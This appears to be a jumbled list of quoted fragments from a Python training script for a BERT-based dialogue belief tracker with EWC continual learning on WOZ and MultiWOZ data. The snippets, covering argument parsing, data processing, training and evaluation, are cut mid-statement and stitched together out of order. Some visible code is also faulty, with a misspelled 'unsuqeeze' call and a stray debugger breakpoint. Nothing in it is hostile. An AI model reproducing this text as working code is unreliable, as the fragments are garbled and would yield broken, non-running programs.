torch.tensor([f.prev_label_id for f in features], dtype=torch.long) # reshape tensors to [batch,", "global_step) summary_writer.add_scalar(\"Validate/Prev_Acc\", prev_dev_acc, global_step) if n_gpu == 1: for i, slot in enumerate(processor.target_slot):", "for multi-gpu eval_loss_slot = [0] prev_eval_loss_slot = [0] eval_accuracy = eval_accuracy / nb_eval_examples", "this will be padded.\") parser.add_argument('--hidden_dim', type=int, default=100, help=\"hidden dimension used in belief tracker\")", "example.guid.split('-')[1] curr_turn_idx = int(example.guid.split('-')[2]) if (prev_dialogue_idx is not None) and (prev_dialogue_idx != curr_dialogue_idx):", "square=True, yticklabels=y, vmin=0.0, vmax=1.0, cbar=False, ax=ax) class_correct = [[0 for x in range(num_labels[i])]", "for val in eval_acc_slot]), 'prev_eval_loss': prev_eval_loss, 'prev_eval_accuracy': prev_eval_accuracy, 'prev_eval_loss_slot': '\\t'.join([str(val / nb_eval_examples_prev) for", "torch.tensor([f.input_ids for f in features], dtype=torch.long) all_input_len= torch.tensor([f.input_len for f in features], dtype=torch.long)", "written.\") parser.add_argument('--load_path', type=str, default='', help='pretrained model directory name') parser.add_argument(\"--target_slot\", default='', type=str, required=True, help=\"Target", "prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss,", "= acc_slot * nb_eval_ex else: eval_acc_slot += acc_slot * nb_eval_ex return eval_loss, eval_loss_slot,", "Running training *****\") logger.info(\" Num examples = %d\", len(train_examples)) logger.info(\" Batch size =", "(i, line) in enumerate(lines): guid = \"%s-%s-%s\" % (set_type, line[0], line[1]) # line[0]:", "the list of labels for this data set.\"\"\" raise NotImplementedError() @classmethod def _read_tsv(cls,", "file.\"\"\" with open(input_file, \"r\", encoding='utf-8') as f: reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar) lines", "Main ############################################################################### def main(): parser = argparse.ArgumentParser() ## Required parameters parser.add_argument('--data_dir', type=str, required=True,", "training.\") parser.add_argument(\"--lambda_ewc\", default=0.1, type=float, help=\"Hyper-parameter for EWC\") parser.add_argument(\"--no_cuda\", action='store_true', help=\"Whether not to use", "break if len(tokens_a) > len(tokens_b): tokens_a.pop() else: tokens_b.pop() ############################################################################### # Miscellaneous functions ###############################################################################", "== 0 if prev_dialogue_idx is None or prev_turn_idx < max_turn_length: features.append(InputFeatures(input_ids=input_ids, input_len=input_len, label_id=label_id,", "static_loss_scale=args.loss_scale) else: optimizer = BertAdam(optimizer_grouped_parameters, lr=args.learning_rate, warmup=args.warmup_proportion, t_total=t_total) logger.info(optimizer) ############################################################################### # Training code", "_ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss_ewc = ewc.penalty(model) loss = loss_", "quotechar=None): \"\"\"Reads a tab separated value file.\"\"\" with open(input_file, \"r\", encoding='utf-8') as f:", "draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(), tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()), [*range(0, args.attn_head)], ax=axs[turn]) axs[turn].set_title(\"turn %d slot: %s label: %s pred: %s\"", "with '#') continue lines.append(line) return lines class Processor(DataProcessor): \"\"\"Processor for the belief tracking", "to run eval on the test set.\") parser.add_argument(\"--do_analyze\", action='store_true', help=\"Whether to run analysis", "use CUDA when available\") parser.add_argument(\"--local_rank\", type=int, default=-1, help=\"local_rank for distributed training on gpus\")", "slot_len) if n_gpu > 1: model = torch.nn.DataParallel(model) if args.do_eval and (args.local_rank ==", "eval_acc_slot / nb_eval_examples prev_eval_acc_slot = prev_eval_acc_slot / nb_eval_examples_prev total_acc_slot = {} for val,", "fp_ontology.close() elif config.data_dir == \"data/multiwoz\": fp_ontology = open(os.path.join(config.data_dir, \"ontology.json\"), \"r\") ontology = json.load(fp_ontology)", "%(name)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S', level=logging.INFO) logger = logging.getLogger(__name__) ############################################################################### # Data Preprocessing", "eval_loss_slot[i] = eval_loss_slot[i] + l * nb_eval_ex if eval_acc_slot is None: eval_acc_slot =", "in features], dtype=torch.long) # reshape tensors to [batch, turn, word] all_input_ids = all_input_ids.view(-1,", "in self.prev_slot_idx] examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label, prev_label=prev_label)) return examples def convert_examples_to_features(examples, label_list,", "of training to perform linear learning rate warmup for. \" \"E.g., 0.1 =", "training and dev sets.\"\"\" prev_dialogue_index = None examples = [] for (i, line)", "results *****\") for key in sorted(result.keys()): logger.info(\" %s = %s\", key, str(result[key])) writer.write(\"%s", "def get_train_examples(self, data_dir): \"\"\"Gets a collection of `InputExample`s for the train set.\"\"\" raise", "+ \" # \" + text_a text_b = line[3] + \" # \"", "WordPiece tokenization. \\n\" \"Sequences longer than this will be truncated, and sequences shorter", "device): features = [] for label in labels: label_tokens = [\"[CLS]\"] + tokenizer.tokenize(label)", "\" \".join([str(x) for x in input_len])) logger.info(\"label: \" + label_info) logger.info(\"previous label: \"", "\"price range\" if idx in self.target_slot_idx: self.target_slot.append(slot) elif idx in self.prev_slot_idx: self.prev_slot.append(slot) self.all_slot", "SequentialSampler(dev_data) dev_dataloader = DataLoader(dev_data, sampler=dev_sampler, batch_size=args.dev_batch_size) logger.info(\"Loaded data!\") ############################################################################### # Build the models", "eval on the test set.\") parser.add_argument(\"--do_analyze\", action='store_true', help=\"Whether to run analysis on the", "prev_slot = [] for key, value in slot_idx.items(): if key == config.target_slot: target_slot.append(value)", "eval_acc_slot is None: eval_acc_slot = acc_slot * nb_eval_ex else: eval_acc_slot += acc_slot *", "label_list) prev_label_id, prev_label_info = _get_label(example.prev_label, prev_label_list) if ex_index < 5: logger.info(\"*** Example ***\")", "eval_loss_slot = [0] prev_eval_loss_slot = [0] eval_accuracy = eval_accuracy / nb_eval_examples prev_eval_loss =", "x ############################################################################### # Main ############################################################################### def main(): parser = argparse.ArgumentParser() ## Required parameters", "= None, None nb_eval_steps, nb_eval_examples = 0, 0 prev_eval_loss, prev_eval_accuracy = 0, 0", "== max_seq_length label_id, label_info = _get_label(example.label, label_list) prev_label_id, prev_label_info = _get_label(example.prev_label, prev_label_list) if", "belief tracker\") parser.add_argument('--num_rnn_layers', type=int, default=1, help=\"number of RNN layers\") parser.add_argument('--zero_init_rnn', action='store_true', help=\"set initial", "prev_label=prev_label)) return examples def convert_examples_to_features(examples, label_list, prev_label_list, max_seq_length, tokenizer, max_turn_length): \"\"\"Loads a data", "== 1: if dev_loss_slot is None: dev_loss_slot = [ l * num_valid_turn for", "slot = \"price range\" if idx in self.target_slot_idx: self.target_slot.append(slot) elif idx in self.prev_slot_idx:", "enumerate(label): label = _hard_coding_label(label) label_id.append(label_map[i][label]) label_info += '%s (id = %d) ' %", "* nb_eval_ex if eval_acc_slot is None: eval_acc_slot = acc_slot * nb_eval_ex else: eval_acc_slot", "is None or prev_dialogue_index != line[0]: text_a = line[2] text_b = line[3] prev_dialogue_index", "+ target_label_list # All slot value labels num_labels = [len(labels) for labels in", "import EWC else: raise ValueError('nbt type should be either rnn or transformer') from", "config.target_slot == 'all': slot_idx = {'attraction':'0:1:2', 'bus':'3:4:5:6', 'hospital':'7', 'hotel':'8:9:10:11:12:13:14:15:16:17',\\ 'restaurant':'18:19:20:21:22:23:24', 'taxi':'25:26:27:28', 'train':'29:30:31:32:33:34'} target_slot", "all_label_ids, all_prev_label_ids) # Run prediction for full data eval_sampler = SequentialSampler(eval_data) eval_dataloader =", "nslot): fig, axs = plt.subplots(nturn, 1, figsize=(50, 10*nturn)) print(\"Slot\", slot) for turn in", "label_id, label_info features = [] prev_dialogue_idx = None all_padding = [0] * max_seq_length", "= None if example.text_b: tokens_b = [x if x != '#' else '[SEP]'", "layers\") parser.add_argument('--zero_init_rnn', action='store_true', help=\"set initial hidden of rnns zero\") parser.add_argument('--skip_connect', type=str, default=False, help=\"skip-connection\")", "distributed and fp16 training.\") optimizer = FusedAdam(optimizer_grouped_parameters, lr=args.learning_rate, bias_correction=False, max_grad_norm=1.0) if args.loss_scale ==", "slot) for turn in range(nturn): draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(), tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()), [*range(0, args.attn_head)], ax=axs[turn]) axs[turn].set_title(\"turn %d slot:", "'') text['label'] = [str(label_list[idx][x]) for idx, x in enumerate(label.cpu().numpy())] text['pred'] = [str(label_list[idx][x]) for", "with open(output_eval_incorr_file, \"w\") as writer: total_class_acc = 0 total_slot_class_acc = [] nlabels =", "data ############################################################################### # Get Processor processor = Processor(args) prev_label_list = processor.get_prev_labels() # Slot", "value): dynamic loss scaling.\\n\" \"Positive power of 2: static loss scaling value.\\n\") parser.add_argument(\"--do_not_use_tensorboard\",", "range(len(num_labels))] class_count = [[0 for x in range(num_labels[i])] for i in range(len(num_labels))] eval_examples", "NotImplementedError() @classmethod def _read_tsv(cls, input_file, quotechar=None): \"\"\"Reads a tab separated value file.\"\"\" with", "%d slot: %s label: %s pred: %s\" % (turn, processor.target_slot[slot], str(label_list[slot][label_ids[0][turn][slot].item()]), str(label_list[slot][pred_slot[0][turn][slot].item()]) ))", "in labels: label_tokens = [\"[CLS]\"] + tokenizer.tokenize(label) + [\"[SEP]\"] label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens) label_len", "else: writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, -1) ) total_slot_class_acc.append(slot_class_acc/(vid+1)) total_class_acc+=slot_class_acc total_class_acc /= nlabels for sid,", "and [SEP] with \"- 2\" if len(tokens_a) > max_seq_length - 2: tokens_a =", ") slot_class_acc += class_acc nlabels += 1 else: writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, -1) )", "= prev_loss.mean() prev_acc = prev_acc.mean() prev_acc_slot = prev_acc_slot.mean(0) nb_eval_ex_prev = (prev_label_ids[:,:,0].view(-1) != -1).sum().item()", "\"data/woz\" or config.data_dir==\"data/woz-turn\": fp_ontology = open(os.path.join(config.data_dir, \"ontology_dstc2_en.json\"), \"r\") ontology = json.load(fp_ontology) ontology =", "no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight'] optimizer_grouped_parameters = [ {'params': [p for n, p", "pretrained BERT model\") parser.add_argument(\"--task_name\", default=None, type=str, required=True, help=\"The name of the task to", "key) or ('value' in key): del_list.append(key) for key in del_list: del ptr_model[key] if", "= val total_acc_slot = sorted(total_acc_slot.items(), key=operator.itemgetter(0)) loss = tr_loss / nb_tr_steps if args.do_train", "label_ids[0], pred_slot[0]): if label[0] == -1: break text = {} text['input'] = '", "encoder\") ## Other parameters parser.add_argument(\"--max_seq_length\", default=64, type=int, help=\"The maximum total input sequence length", "any(nd in n for nd in no_decay)], 'weight_decay': 0.01, 'lr': args.learning_rate}, {'params': [p", "all_label_ids_dev, all_prev_label_ids_dev) dev_sampler = SequentialSampler(dev_data) dev_dataloader = DataLoader(dev_data, sampler=dev_sampler, batch_size=args.dev_batch_size) logger.info(\"Loaded data!\") ###############################################################################", "nb_tr_steps if args.do_train else None result = {'eval_loss': eval_loss, 'eval_accuracy': eval_accuracy, 'loss': loss,", "json.load(fp_ontology) ontology = ontology[\"informable\"] del ontology[\"request\"] for slot in ontology.keys(): ontology[slot].append(\"do not care\")", "and value_lookup del_list.append(key) if ('rnn.' in key): # rename rnn -> nbt, rename_list.append(key)", "open(output_eval_incorr_file, \"w\") as writer: total_class_acc = 0 total_slot_class_acc = [] nlabels = 0", "prev_label_id=[-1]*prev_slot_dim)] * (max_turn_length - prev_turn_idx - 1) assert len(features) % max_turn_length == 0", "summary_writer.add_scalar(\"Train/Loss_Total\", loss, global_step) summary_writer.add_scalar(\"Train/JointAcc\", acc, global_step) if n_gpu == 1: for i, slot", "a sequence pair in place to the maximum length.\"\"\" while True: total_length =", "slot_len = \\ get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if args.local_rank", "* loss_ewc if args.gradient_accumulation_steps > 1: loss = loss / args.gradient_accumulation_steps if args.fp16:", "+= 1 # Perform evaluation on validation dataset model.eval() dev_loss = 0 dev_acc", "- %(name)s - %(message)s', datefmt='%m/%d/%Y %H:%M:%S', level=logging.INFO) logger = logging.getLogger(__name__) ############################################################################### # Data", "self.prev_slot.append(slot) self.all_slot = self.prev_slot + self.target_slot logger.info('Processor: previous slots: ' + ', '.join(self.prev_slot))", "else: # Account for [CLS] and [SEP] with \"- 2\" if len(tokens_a) >", "parser.add_argument(\"--bert_dir\", default='/gfs/nlp/.pytorch_pretrained_bert', type=str, required=False, help=\"The directory of the pretrained BERT model\") parser.add_argument(\"--task_name\", default=None,", "# Number of labels of all slots #prev_slot_id = processor.prev_slot_idx #target_slot_id = processor.target_slot_idx", "None #### EWC: calculate Fisher ewc = EWC(model, dev_dataloader, oldtask=prev_slot_id, num_labels=num_labels, device=device, n_gpu=n_gpu)", "loss_ewc = ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc prev_loss, _, prev_acc,", "p) for n, p in model.named_parameters() if p.requires_grad] no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']", "n_gpu == 1: loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu,", "nb_eval_ex return eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot = \\ _post_process(eval_loss,", "batch if input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids =", "loss.item() nb_tr_examples += input_ids.size(0) nb_tr_steps += 1 if (step + 1) % args.gradient_accumulation_steps", "prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1] * prev_slot_dim)] * (max_turn_length", "== config.target_slot: target_slot.append(value) else: prev_slot.append(value) config.target_slot = ':'.join(target_slot) config.prev_slot = ':'.join(prev_slot) else: raise", "text = turn['input'] + '\\t' for label, pred in zip(turn['label'], turn['pred']): text +=", "dev sets.\"\"\" prev_dialogue_index = None examples = [] for (i, line) in enumerate(lines):", "fp_ontology = open(os.path.join(config.data_dir, \"ontology.json\"), \"r\") ontology = json.load(fp_ontology) for slot in ontology.keys(): ontology[slot].append(\"none\")", "assert len(input_ids) == max_seq_length label_id, label_info = _get_label(example.label, label_list) prev_label_id, prev_label_info = _get_label(example.prev_label,", "key): # remove slot_lookup and value_lookup del_list.append(key) if ('rnn.' in key): # rename", "convert_examples_to_features(examples, label_list, prev_label_list, max_seq_length, tokenizer, max_turn_length): \"\"\"Loads a data file into a list", "sequences shorter \\n\" \"than this will be padded.\") parser.add_argument('--hidden_dim', type=int, default=100, help=\"hidden dimension", "{} for val, idx in zip(torch.cat([eval_acc_slot, prev_eval_acc_slot]), (target_slot_id+prev_slot_id)): total_acc_slot[idx] = val total_acc_slot =", "val total_acc_slot = sorted(total_acc_slot.items(), key=operator.itemgetter(0)) loss = tr_loss / nb_tr_steps if args.do_train else", "FP16_Optimizer from apex.optimizers import FusedAdam except ImportError: raise ImportError( \"Please install apex from", "config.prev_slot = ':'.join(prev_slot) else: raise NotImplementedError() # sorting the ontology according to the", "self.prev_slot_idx] examples.append( InputExample(guid=guid, text_a=text_a, text_b=text_b, label=label, prev_label=prev_label)) return examples def convert_examples_to_features(examples, label_list, prev_label_list,", "############################################################################### # Build the models ############################################################################### # Prepare model if args.nbt =='rnn': from", "= [ len(val)-1 for val in label_list] incorrect_dialogs = [] attention_draw = 5", "/ prev_nb_dev_examples prev_dev_acc = prev_dev_acc / prev_nb_dev_examples if n_gpu == 1: dev_acc_slot =", "-1) ) total_slot_class_acc.append(slot_class_acc/(vid+1)) total_class_acc+=slot_class_acc total_class_acc /= nlabels for sid, slot_acc in enumerate(total_slot_class_acc): writer.write(\"%d\\t%.3f\\n\"", "tokens_a[:(max_seq_length - 2)] tokens = [\"[CLS]\"] + tokens_a + [\"[SEP]\"] input_len = [len(tokens),", "logger.info(\"previous label: \" + prev_label_info) curr_dialogue_idx = example.guid.split('-')[1] curr_turn_idx = int(example.guid.split('-')[2]) if (prev_dialogue_idx", "default=1, type=int, help=\"Total batch size for validation.\") parser.add_argument(\"--eval_batch_size\", default=16, type=int, help=\"Total batch size", "not None: summary_writer.add_scalar(\"Train/LearningRate\", lr_this_step, global_step) for param_group in optimizer.param_groups: param_group['lr'] = lr_this_step optimizer.step()", "prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss_, _,", "prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss, loss_slot,", "as [previous slots + present target slots] slot_token_ids, slot_len = \\ get_label_embedding(processor.all_slot, args.max_label_length,", "max_turn < int(example.guid.split('-')[2]): max_turn = int(example.guid.split('-')[2]) max_turn_length = min(max_turn+1, max_turn_length) logger.info(\"max_turn_length = %d\"", "n_gpu == 1: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model) else: optimizer_grouped_parameters = get_optimizer_grouped_parameters(model.module) t_total = num_train_steps", "all_label_ids, all_prev_label_ids = convert_examples_to_features( eval_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids,", "if (prev_dialogue_idx is not None) and (prev_dialogue_idx != curr_dialogue_idx): if prev_turn_idx < max_turn_length:", "available\") parser.add_argument(\"--local_rank\", type=int, default=-1, help=\"local_rank for distributed training on gpus\") parser.add_argument('--seed', type=int, default=42,", "model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss = loss.mean() acc = acc.mean() acc_slot =", "training to perform linear learning rate warmup for. \" \"E.g., 0.1 = 10%%", "\"%s-%s-%s\" % (set_type, line[0], line[1]) # line[0]: dialogue index, line[1]: turn index if", "loss = loss.mean() acc = acc.mean() acc_slot = acc_slot.mean(0) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot,", "idx = 0 assert len(input_ids) == max_seq_length label_id, label_info = _get_label(example.label, label_list) prev_label_id,", "prev_num_valid_turn for l in prev_loss_slot] prev_dev_acc_slot = prev_acc_slot * prev_num_valid_turn else: for i,", "batch = tuple(t.to(device) for t in batch) input_ids, input_len, label_ids, prev_label_ids = batch", "= eval_loss_slot[i] + l * nb_eval_ex if eval_acc_slot is None: eval_acc_slot = acc_slot", "this flag if you want to set the label encoder trainable. \\n\" \"This", "18:].cpu() == torch.Tensor(none_value_id[18:]).long().repeat(10, 1)) pdb.set_trace() if drawfig == True: #if (len(incorrect_dialogs) < attention_draw):", "= FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale) else: optimizer = BertAdam(optimizer_grouped_parameters, lr=args.learning_rate, warmup=args.warmup_proportion, t_total=t_total) logger.info(optimizer) ############################################################################### #", "to train model. ex. '0:1:2 or an excluding slot name 'attraction'\" ) parser.add_argument(\"--prev_slot\",", "pass.\") parser.add_argument('--fp16', action='store_true', help=\"Whether to use 16-bit float precision instead of 32-bit\") parser.add_argument('--loss_scale',", "in ptr_model.keys(): if ('slot' in key) or ('value' in key): del_list.append(key) for key", "= input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) prev_label_ids = prev_label_ids.unsuqeeze(0) with torch.no_grad():", "Evaluation ############################################################################### # Test output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") # Load a trained model", "args.fp16: optimizer.backward(loss) else: loss.backward() if summary_writer is not None: summary_writer.add_scalar(\"Epoch\", epoch, global_step) summary_writer.add_scalar(\"Train/Loss\",", "learning rate for Adam.\") parser.add_argument(\"--num_train_epochs\", default=3.0, type=float, help=\"Total number of training epochs to", "# ignore comments (starting with '#') continue lines.append(line) return lines class Processor(DataProcessor): \"\"\"Processor", "> 1: loss = loss / args.gradient_accumulation_steps if args.fp16: optimizer.backward(loss) else: loss.backward() if", "','_'), acc_slot[i], global_step) tr_loss += loss.item() nb_tr_examples += input_ids.size(0) nb_tr_steps += 1 if", "help='location of the data corpus') parser.add_argument(\"--bert_model\", default=None, type=str, required=True, help=\"Bert pre-trained model selected", "all_input_len, all_label_ids, all_prev_label_ids) # Run prediction for full data eval_sampler = SequentialSampler(eval_data) eval_dataloader", "= [] for key in ptr_model.keys(): if ('slot' in key) or ('value' in", "for idx, x in enumerate(label.cpu().numpy())] text['pred'] = [str(label_list[idx][x]) for idx, x in enumerate(pred.cpu().numpy())]", "%d\", args.dev_batch_size) logger.info(\" Num steps = %d\", num_dev_steps) all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev =", "classification data sets.\"\"\" def get_train_examples(self, data_dir): \"\"\"Gets a collection of `InputExample`s for the", "+= [0] * (max_seq_length - len(input_ids)) # Note: padding idx = 0 assert", "label_ids, n_gpu, target_slot=target_slot_id) loss = loss.mean() acc = acc.mean() acc_slot = acc_slot.mean(0) prev_loss,", "- %(message)s', datefmt='%m/%d/%Y %H:%M:%S', level=logging.INFO) logger = logging.getLogger(__name__) ############################################################################### # Data Preprocessing ###############################################################################", "nb_tr_steps += 1 if (step + 1) % args.gradient_accumulation_steps == 0: # modify", "sequence pair in place to the maximum length.\"\"\" while True: total_length = len(tokens_a)", "train BERT utterance encoder\") ## Other parameters parser.add_argument(\"--max_seq_length\", default=64, type=int, help=\"The maximum total", "is not empty.\".format(args.output_dir)) os.makedirs(args.output_dir, exist_ok=True) task_name = args.task_name.lower() tb_file_name = args.output_dir.split('/')[1] # Tensorboard", "accumulation: if prev_dialogue_index is None or prev_dialogue_index != line[0]: text_a = line[2] text_b", "label_info = _get_label(example.label, label_list) prev_label_id, prev_label_info = _get_label(example.prev_label, prev_label_list) if ex_index < 5:", "== 2: input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) with torch.no_grad():", "1: dialog = [] for input, label, pred in zip(input_ids[0], label_ids[0], pred_slot[0]): if", "not os.path.exists(vocab_dir): raise ValueError(\"Can't find %s \" % vocab_dir) tokenizer = BertTokenizer.from_pretrained(vocab_dir, do_lower_case=args.do_lower_case)", "slot and values are different between the training and evaluation ptr_model = torch.load(args.load_path,", "for n, p in param_optimizer if any(nd in n for nd in no_decay)],", "on the test set.\") args = parser.parse_args() if os.path.exists(args.output_dir) and os.listdir(args.output_dir) and args.do_train:", "1: for i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Train/Loss_%s\" % slot.replace(' ','_'), loss_slot[i], global_step) summary_writer.add_scalar(\"Train/Acc_%s\"", "self._create_examples( self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\", accumulation) def get_dev_examples(self, data_dir, accumulation=False): \"\"\"See base class.\"\"\" return", "eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids = convert_examples_to_features( eval_examples, label_list, args.max_seq_length, tokenizer,", "str(label_list[slot][pred_slot[0][turn][slot].item()]) )) plt.show() plt.savefig(os.path.join(args.output_dir, \"attention-d%d-slot%s.png\"%(len(incorrect_dialogs), slot))) plt.close() if not acc == 1: dialog", "Note: slot embeddings are ordered as [previous slots + present target slots] slot_token_ids,", "in trange(1): #### TRAIN model.train() tr_loss = 0 nb_tr_examples, nb_tr_steps = 0, 0", "last_update = None best_loss = None #### EWC: calculate Fisher ewc = EWC(model,", "label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens) label_len = len(label_token_ids) label_padding = [0] * (max_seq_length - len(label_token_ids))", "({}) already exists and is not empty.\".format(args.output_dir)) os.makedirs(args.output_dir, exist_ok=True) task_name = args.task_name.lower() tb_file_name", "type=str, required=True, help=\"Target slot idx to train model. ex. '0:1:2 or an excluding", "text_a text_b = line[3] + \" # \" + text_b else: text_a =", "slot_token_ids, slot_len = \\ get_label_embedding(processor.all_slot, args.max_label_length, tokenizer, device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if", "del_list = [] rename_list = [] for key in ptr_model.keys(): if ('slot_lookup' in", "all_prev_label_ids) if args.local_rank == -1: train_sampler = RandomSampler(train_data) else: train_sampler = DistributedSampler(train_data) train_dataloader", "line[0]: text_a = line[2] text_b = line[3] prev_dialogue_index = line[0] else: # The", "return all_input_ids, all_input_len, all_label_ids, all_prev_label_ids def get_label_embedding(labels, max_seq_length, tokenizer, device): features = []", "to run eval on the test set.\") args = parser.parse_args() if os.path.exists(args.output_dir) and", "label embeddings: cosine, euclidean.\") parser.add_argument(\"--train_batch_size\", default=4, type=int, help=\"Total batch size for training.\") parser.add_argument(\"--dev_batch_size\",", "all_input_len, all_label_ids = convert_examples_to_features( eval_examples, label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids =", "turn['input'] + '\\t' for label, pred in zip(turn['label'], turn['pred']): text += '%s\\t%s\\t'%(label, pred)", "'' label_map = [{_label: i for i, _label in enumerate(labels)} for labels in", "loss scaling value.\\n\") parser.add_argument(\"--do_not_use_tensorboard\", action='store_true', help=\"Whether to run eval on the test set.\")", "turn in range(nturn): draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(), tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()), [*range(0, args.attn_head)], ax=axs[turn]) axs[turn].set_title(\"turn %d slot: %s label:", "\\\"lstm\\\"\") elif args.nbt =='turn': from BeliefTrackerSlotQueryMultiSlotTurn import BeliefTracker elif args.nbt == 'transformer': from", "key in del_list: del ptr_model[key] for key in rename_list: new_key = key.replace('rnn.', 'nbt.')", "calculate Fisher ewc = EWC(model, dev_dataloader, oldtask=prev_slot_id, num_labels=num_labels, device=device, n_gpu=n_gpu) for epoch in", "2\" if len(tokens_a) > max_seq_length - 2: tokens_a = tokens_a[:(max_seq_length - 2)] tokens", "from torch.utils.data import TensorDataset, DataLoader, RandomSampler, SequentialSampler from torch.utils.data.distributed import DistributedSampler from pytorch_pretrained_bert.tokenization", "[0] eval_accuracy = eval_accuracy / nb_eval_examples prev_eval_loss = prev_eval_loss / nb_eval_examples_prev prev_eval_accuracy =", "# rename rnn -> nbt, rename_list.append(key) for key in del_list: del ptr_model[key] for", "nb_eval_examples = 0, 0 prev_eval_loss, prev_eval_accuracy = 0, 0 prev_eval_loss_slot, prev_eval_acc_slot = None,", "1, figsize=(50, 10*nturn)) print(\"Slot\", slot) for turn in range(nturn): draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(), tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()), [*range(0, args.attn_head)],", "// torch.distributed.get_world_size() if args.fp16: try: from apex.optimizers import FP16_Optimizer from apex.optimizers import FusedAdam", "label in labels: label_tokens = [\"[CLS]\"] + tokenizer.tokenize(label) + [\"[SEP]\"] label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens)", "features = [] prev_dialogue_idx = None all_padding = [0] * max_seq_length all_padding_len =", "+ self.target_slot logger.info('Processor: previous slots: ' + ', '.join(self.prev_slot)) logger.info('Processor: target slots: '+", "allow no further improvement.\") parser.add_argument(\"--warmup_proportion\", default=0.1, type=float, help=\"Proportion of training to perform linear", "wrong prev_slot_id = list(range(0, len(processor.prev_slot))) # List of slots in previous task target_slot_id", "warmup=args.warmup_proportion, t_total=t_total) logger.info(optimizer) ############################################################################### # Training code ############################################################################### if args.do_train: logger.info(\"Training...\") global_step =", "prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) prev_loss = prev_loss.mean() prev_acc", "num_train_steps = int(len(train_examples) / args.train_batch_size * args.num_train_epochs) num_dev_steps = int(len(dev_examples) / args.dev_batch_size *", "epoch > 100 and last_update + args.patience <= epoch: if last_update + args.patience", "help=\"Target slot idx to train model. ex. '0:1:2 or an excluding slot name", ">= 1\".format( args.gradient_accumulation_steps)) args.train_batch_size = int(args.train_batch_size / args.gradient_accumulation_steps) # Set the random seed", "= processor.prev_slot_idx #target_slot_id = processor.target_slot_idx # wrong prev_slot_id = list(range(0, len(processor.prev_slot))) # List", "Set the random seed manually for reproducibility. random.seed(args.seed) np.random.seed(args.seed) torch.manual_seed(args.seed) if n_gpu >", "nb_eval_examples += nb_eval_ex nb_eval_steps += 1 def _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot,", "exists and is not empty.\".format(args.output_dir)) os.makedirs(args.output_dir, exist_ok=True) task_name = args.task_name.lower() tb_file_name = args.output_dir.split('/')[1]", "according to the alphabetic order of the slots self.ontology = collections.OrderedDict(sorted(ontology.items())) # select", "slot, value = domain if slot == \"pricerange\": slot = \"price range\" if", "of Present task label_list = prev_label_list + target_label_list # All slot value labels", "[(n, p) for n, p in model.named_parameters() if p.requires_grad] no_decay = ['bias', 'LayerNorm.bias',", "example) in enumerate(examples): tokens_a = [x if x != '#' else '[SEP]' for", "= t_total // torch.distributed.get_world_size() if args.fp16: try: from apex.optimizers import FP16_Optimizer from apex.optimizers", "input_ids.dim() == 2: input_ids = input_ids.unsqueeze(0) input_len = input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) prev_label_ids", "task to train: bert, bert-gru, bert-lstm, \" \"bert-label-embedding, bert-gru-label-embedding, bert-lstm-label-embedding\") parser.add_argument(\"--output_dir\", default=None, type=str,", "loss.item() * num_valid_turn dev_acc += acc.item() * num_valid_turn prev_num_valid_turn = torch.sum(prev_label_ids[:,:,0].view(-1) > -1,", "maximum total input sequence length after WordPiece tokenization. \\n\" \"Sequences 